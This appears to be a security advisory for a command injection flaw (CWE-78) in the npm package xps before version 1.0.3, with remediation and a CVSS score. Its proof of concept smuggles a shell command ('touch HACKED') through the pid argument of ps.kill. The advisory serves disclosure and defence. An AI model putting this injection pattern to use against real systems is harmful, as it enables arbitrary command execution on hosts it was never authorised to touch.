Command Injection

Affecting xps package, versions <1.0.3

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

xps is a cross-platform library for listing and killing processes.

Affected versions of this package are vulnerable to Command Injection. The argument pid is used to build the command that is passed to the child_process.exec function without any sanitization.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/
  2. install latest vulnerable xps module (v1.0.2): npm i xps@1.0.2

  3. create the following PoC JavaScript file (poc.js):

    const ps = require('xps');
    ps.kill('`touch HACKED;`').fork();
  4. make sure that the HACKED file does not exist: ls

  5. execute the poc.js file: node poc.js

  6. the HACKED file is created: ls

    Remediation

    Upgrade xps to version 1.0.3 or higher.

    References

CVSS Score

9.8
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
d3lla
CWE
CWE-78
Snyk ID
SNYK-JS-XPS-590098
Disclosed
23 Jul, 2020
Published
24 Jul, 2020